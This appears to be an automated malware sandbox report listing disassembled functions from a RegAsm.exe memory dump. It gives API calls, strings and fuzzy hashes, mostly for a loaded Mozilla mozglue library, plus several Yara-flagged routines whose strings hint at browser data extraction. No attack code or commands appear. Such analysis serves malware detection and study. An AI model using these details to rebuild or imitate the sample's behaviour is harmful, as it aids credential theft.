Instruction Fuzzy Hash: B5F0BEB6200204ABDE10AF649848B6A7BFDFB8A2ADF002011FA0683701DF35AC01CB61

Function 6C05F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C05F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C05F598), ref: 6C05F621

Part of subcall function 6C0594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0594EE
Part of subcall function 6C0594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C059508

GetCurrentThreadId.KERNEL32 ref: 6C05F637
AcquireSRWLockExclusive.KERNEL32(6C09F4B8,?,?,00000000,?,6C05F598), ref: 6C05F645
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8,?,?,00000000,?,6C05F598), ref: 6C05F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C05F62A

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: f63456ce54f570031c69ca136699ac972a5138d2656015bd38f096b10b49a0d4
Instruction ID: c48e482f74aca464387f429adadf8e8de600ef96f9fc257457cd93f40096efe8
Opcode Fuzzy Hash: f63456ce54f570031c69ca136699ac972a5138d2656015bd38f096b10b49a0d4
Instruction Fuzzy Hash: 10F05EB5200204ABDE106F658848B6A7BFDFB8A2ADF402415FA0683791DF75AC16CB65

Function 6C020E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C020DF8), ref: 6C020E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C020EA1
__Init_thread_footer.LIBCMT ref: 6C020EB5
FreeLibrary.KERNEL32 ref: 6C020EC5

Strings

GetProcessMitigationPolicy, xrefs: 6C020E9B
kernel32.dll, xrefs: 6C020E7D

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: f37253dbe3051a38a89d78a2e8176881e6a3f50ff44aedb335a0f67f818e2c0a
Instruction ID: 29db90dec32ddcb51c9839a61ce8dd07726fa542f858cdf7f5c095d6db639a81
Opcode Fuzzy Hash: f37253dbe3051a38a89d78a2e8176881e6a3f50ff44aedb335a0f67f818e2c0a
Instruction Fuzzy Hash: 24014670708381DBDF008FE8C928B46B3FDF707318F206529F90582B80EF39A6948A42

Function 6C0505F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C04CFAE,?,?,?,6C0131A7), ref: 6C0505FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C04CFAE,?,?,?,6C0131A7), ref: 6C050616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C0131A7), ref: 6C05061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C0131A7), ref: 6C050627

Strings

<jemalloc>, xrefs: 6C0505FA, 6C05060F
: (malloc) Error in VirtualFree(), xrefs: 6C05061B, 6C050625

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: b6f336fc01e44a810289ef5b6fae191de0cfd32bab3bc6bad1c3b96ce7a25126
Instruction ID: f47e28754f2bac140b5216793b8c4f842a067383a2bce783b47f726845a0bd2e
Opcode Fuzzy Hash: b6f336fc01e44a810289ef5b6fae191de0cfd32bab3bc6bad1c3b96ce7a25126
Instruction Fuzzy Hash: BBE08CE2A0606037F9142266BC86EBB766CDBC6134F080139FE0D83301E94ABD1A51F6

Function 6C0205F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b1345f81810db05361d7be225184631c88780586b48728b449d5d411b1fabd7
Instruction ID: e11b73f4a417b71b4c95e1521d105dd053d8b379082ccff92807e3697ebb7ccb
Opcode Fuzzy Hash: 7b1345f81810db05361d7be225184631c88780586b48728b449d5d411b1fabd7
Instruction Fuzzy Hash: 86A13770A047458FDB24CF29C594B9AFBF5BF48308F54866ED48A97B00EB34AA45CF90

Function 6C0714A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0714C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0714E2
GetCurrentThreadId.KERNEL32 ref: 6C071546
InitializeConditionVariable.KERNEL32(?), ref: 6C0715BA
free.MOZGLUE(?), ref: 6C0716B4

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: e4435f6efc61b90f0f37d638fa74c8429b4079932231b778df4c811c24f23c59
Instruction ID: c5e1e18ff8250732da1b3d28f8ca60ac6158a9691fd48e0a35d0bc9016d0f16e
Opcode Fuzzy Hash: e4435f6efc61b90f0f37d638fa74c8429b4079932231b778df4c811c24f23c59
Instruction Fuzzy Hash: FF61EC76A007049BDB258F21C880BDEB7F5BF89308F44951CED8A57751EB30E988CBA1

Function 6C06C160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C06C1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C06C293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C06C29E

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: 31e4b4f777bbe7f225693efc224500116b00256eb75961e94cc3b972cb62e7f5
Instruction ID: d0ff998604bdf33484cf6f6cad0c39b3970e045816729a9da643b6df76aa0bd3
Opcode Fuzzy Hash: 31e4b4f777bbe7f225693efc224500116b00256eb75961e94cc3b972cb62e7f5
Instruction Fuzzy Hash: 7561BB71A04219CFCF14DFA9D880AAEBBF5FF4A314F154529E902A7A50C730A944CFA0

Function 6C069F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C069FDB
free.MOZGLUE(?,?), ref: 6C069FF0
free.MOZGLUE(?,?), ref: 6C06A006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C06A0BE
free.MOZGLUE(?,?), ref: 6C06A0D5
free.MOZGLUE(?,?), ref: 6C06A0EB

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: b898aa343b53108acaa1c0443c454542f530d4170c0c326538222c9ce3e56935
Instruction ID: b1b7d307b2caee4e67c837fe738261486fcbf642be9ab03736243e856b9bb6df
Opcode Fuzzy Hash: b898aa343b53108acaa1c0443c454542f530d4170c0c326538222c9ce3e56935
Instruction Fuzzy Hash: 8061C1794087129FC711DF19C48065AB3F5FFC8328F549659E8999BB02E731E986CBC1

Function 00413259 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413278
StrCmpCA.SHLWAPI(00000000,004367D8), ref: 004132B1
strtok_s.MSVCRT ref: 00413371

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
Instruction ID: 735330a1d008a833b374886be4d947a81621c86a210c44f2da093846d2bcbd8c
Opcode Fuzzy Hash: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
Instruction Fuzzy Hash: 64319671E001099FCB14DF68CC85BAA77A8BB08717F51505BEC05DA191EB7CCB818B4C

Function 6C06DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C06DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C06D38A,?), ref: 6C06DC6F
free.MOZGLUE(?,?,?,?,?,6C06D38A,?), ref: 6C06DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C06D38A,?), ref: 6C06DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C06D38A,?), ref: 6C06DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C06D38A,?), ref: 6C06DD4A

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: ce2405716c566c2a0c73a7708a0092a8e08b9d20467d7da3fdba241b3df427b6
Instruction ID: f94135af076c8a5592242957c3d4abc64232c95b980971ff3ec7528550fe502f
Opcode Fuzzy Hash: ce2405716c566c2a0c73a7708a0092a8e08b9d20467d7da3fdba241b3df427b6
Instruction Fuzzy Hash: 2A415075A00716CFCB00CF9AC880A9AB7F5FF89318B654569D949ABB11DB71FC00CB90

Function 6C06C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C06C82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C06C842

Part of subcall function 6C06CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C08B5EB,00000000), ref: 6C06CB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C06C863
std::_Facet_Register.LIBCPMT ref: 6C06C875

Part of subcall function 6C04B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C08B636,?), ref: 6C04B143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C06C89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C06C8BC

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: 21c27e6b983d501bc7012e71c8a261c566f4efd0d6c8478c60a98e5ff7ff18a5
Instruction ID: 169d044ddc3db8c462a317bcdba3bc1654776bb4e0eae39871b07061f12eece8
Opcode Fuzzy Hash: 21c27e6b983d501bc7012e71c8a261c566f4efd0d6c8478c60a98e5ff7ff18a5
Instruction Fuzzy Hash: 78116375B012099FCF10DFA5C885AAE7BB5FF89365F140129E60697751EF30AD04CB91

Function 0041210E Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,00000000,?,?,?,00413794,00000000,00000010), ref: 00412119
lstrcpynA.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 00412132
lstrlenA.KERNEL32(?), ref: 00412144
wsprintfA.USER32 ref: 00412156

Strings

C:\Users\user\Desktop\, xrefs: 0041212C, 00412131
%s%s, xrefs: 00412150

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\Desktop\
API String ID: 1206339513-4107738187
Opcode ID: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
Instruction ID: 2b65b01ea0560ea7e18c8daf8da5e1637e4a778ce13f385dfd922e5b6f13eae1
Opcode Fuzzy Hash: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
Instruction Fuzzy Hash: 83F0E9322002157FDF091F99DC48D9B7FAEDF45666F000061F908D2211C6775F1586E5

Function 6C04D5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C01EB57,?,?,?,?,?,?,?,?,?), ref: 6C04D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C01EB57,?), ref: 6C04D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C01EB57,?), ref: 6C04D673
free.MOZGLUE(?), ref: 6C04D888

Strings

|Enabled, xrefs: 6C04D81E

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
Opcode ID: 455fff0c476e6b1202594fda5d6a846339366ef02a62dfec51ab97a163ffef4d
Instruction ID: 9a50e05e9cdac18f5723cdddfef7c357fe94fb025367a0dd9e77688c3a5900b7
Opcode Fuzzy Hash: 455fff0c476e6b1202594fda5d6a846339366ef02a62dfec51ab97a163ffef4d
Instruction Fuzzy Hash: BFA104B0A04304CFDB11CF69C4907AFBBF5AF4A318F18816DD899AB741D735A945CBA1

Function 6C060180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C060270
GetCurrentThreadId.KERNEL32 ref: 6C0602E9
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C0602F6
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C06033A

Strings

about:blank, xrefs: 6C06020F

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: 7d9d571d3691db4c488692f6ba9d0dc598a62fbb40da2a28f4f33ff8cfa4febe
Instruction ID: 56a3aa9947b75d4f1ed6d63385fab9267f3c7a05cf82e90dbd945d176b4d2612
Opcode Fuzzy Hash: 7d9d571d3691db4c488692f6ba9d0dc598a62fbb40da2a28f4f33ff8cfa4febe
Instruction Fuzzy Hash: B451CE74A0421ACFCB00CF1AC880B9EB7F5FF88328F644519D91AA7B50DB31B945CB95

Function 0040826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00408307
LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0040833C

Strings

v20, xrefs: 00408286
ERROR_RUN_EXTRACTOR, xrefs: 004082BE
v10, xrefs: 004082CE

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal_memset
String ID: ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 52611349-380572819
Opcode ID: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
Instruction ID: daba9ed892d092cabdd565eab6a30784efdfa5406d791c1b040b6213e04440cf
Opcode Fuzzy Hash: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
Instruction Fuzzy Hash: 0141B3B2A00118ABCF10DFA5CD42ADE3BB8AB84714F15413BFD40F7280EB78D9458B99

Function 6C05E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C05E12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C05E084,00000000), ref: 6C05E137

Part of subcall function 6C0594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0594EE
Part of subcall function 6C0594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C059508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C05E196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C05E1E9

Part of subcall function 6C0599A0: GetCurrentThreadId.KERNEL32 ref: 6C0599C1
Part of subcall function 6C0599A0: AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C0599CE
Part of subcall function 6C0599A0: ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C0599F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6C05E13F

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: 381d5e6591233f814c630d249123875321b23cf666cf79ff69f76a451f856777
